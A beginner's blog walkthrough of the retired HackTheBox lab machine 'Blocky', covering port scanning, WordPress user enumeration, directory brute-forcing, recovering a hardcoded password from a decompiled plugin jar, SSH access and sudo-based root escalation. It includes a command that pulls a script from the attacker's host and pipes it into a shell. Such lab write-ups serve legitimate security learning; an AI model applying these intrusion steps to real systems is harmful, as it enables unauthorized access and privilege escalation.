This is my 1st blog and a step towards OSCP Journey…
“Blocky” is a retired box from HackTheBox (11/200)
Lets start pwning it ❗️
Reconnaissance
The first thing to do it to use Linux built-in tool nmap to scan the ports of the machine.
nmap -sC -sV 10.10.10.37 -o nmap.txt- -sC: run all the default scripts related to the specific port
- -sV: detect the version of the service used
- -o: to output the result
Looking at it we can see that on port 80 Apache based website is running so lets check the website. Another thing to notice is that ftp and ssh ports are also running on port 21 and port 22 respectively.
Enumeration
While enumerating we saw that it is a wordpress site so our next move is to run Linux built-in tool wpscan but before that we will resolve the DNS by putting blocky.com for 10.10.10.37 in the /etc/hosts file.
wpscan --url http://blocky.com -e- -e : is for enumerating everything
This gave us a very useful information, an authentic user ‘notch’ and we can verify it using wordpress login page.
“The password you entered for the username notch is incorrect” This error shows that notch is an authenticated user of the wordpress account.
Our next step is to perform directory brute-force using Linux built-in tool gobuster that will list all the directories of the website.
gobuster dir -u http://blocky.com -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -o Bustydirectory.txt -t 20- dir: for directory brute-forcing
- -u: target url
- -w: word-list for brute-forcing
- -o: output
- -t: number of entries per second
Now lets check these directories…
Going through the wiki directory gave us the hint to check the plugins directory that contains some useful database information.
Hmm…Interesting!! What are we waiting for?
Lets check this directory then 😃
😮 They are java files so after extracting them we will have to use jd-gui tool to read the data. You can also install this tool using the command
sudo apt-get install jd-guiI have extracted them in the decompile and decompile2 folder respectively
jar xvf /decompile/BlockyCore.jar
jar xvf /decompile2/griefprevention-1.11.2-3.1.1.298.jar
Here it is, what we can see after extracting BlockyCore.jar
Using jd-gui to read the files.
Looking through the BlockyCore.class I found the “password” that will let us in.
To ease my life I have saved both credentials in the file named “credentials”
From here , we have 3 methods to own this machine. I will list all of the 3 methods but we will go with the easiest one, yes we won’t learn too much this time but its all good until we are learning 😉
- Getting in through ssh (‘sudo’ vulnerability)
- Gaining access through www-data (using ftp)
- Gaining access through Kernel Exploit(CVE-2017–6074)
Gaining a foothold
We checked the credentials against the wordpress login page and were failed to access it. Then we use ssh connection and got in to the machine.
ssh notch@10.10.10.37
Noice!! we have captured 🏁 user flag.
Privilege Escalation
The tool that I have used to priv-escalate is PEASS. So now we have to put this ‘linpeas.sh’ on the machine and to do this we will use “curl”. Before that we will make our host live locally so that we can transfer it from our computer to the machine.
sudo python -m SimpleHTTPServer 80This command will make our current folder live as a host locally. And we did it in the linPEAS folder because it contains linpeas.sh
The below command will curl it,run it and save it in linpriv.txt file.
curl 10.10.14.9/linpeas.sh |sh -a >linpriv.txt
Now we have to use the following command to read it in colors.
less -r linpriv.txt
OK so basically what’s happening here is that after gaining user level access through ssh port now we are escalating it to a higher level which is root level.To become a root user we have to find vulnerabilities in this system and to do this we have linpeas to the rescue. Linpeas.sh is a script that search for possible paths to escalate privileges on Linux/Unix* hosts.
Going through it we found the vulnerability known as “sudo vulnerability”
Through this we were able to know that using one word ‘sudo’ we can do whatever we want ,even tho we were notch user and the root directory was not accessible but we were still able to extract root.txt flag 🚩 hiding in the root directory.Sudo is not just a normal ‘vulnerability’ with this a person having user level access is able to perform root level activities.
After that I used the following command to become the root user
sudo su
Lessons Learned
- A Developer should not use weak response based on the validity of submitted credentials as this can lead to User Enumeration.
- Important/Sensitive files containing any type of “username” or “password” should not be kept publicly available.
- Users should not be given sudo privileges.
#Got inspired by Rana Khalil
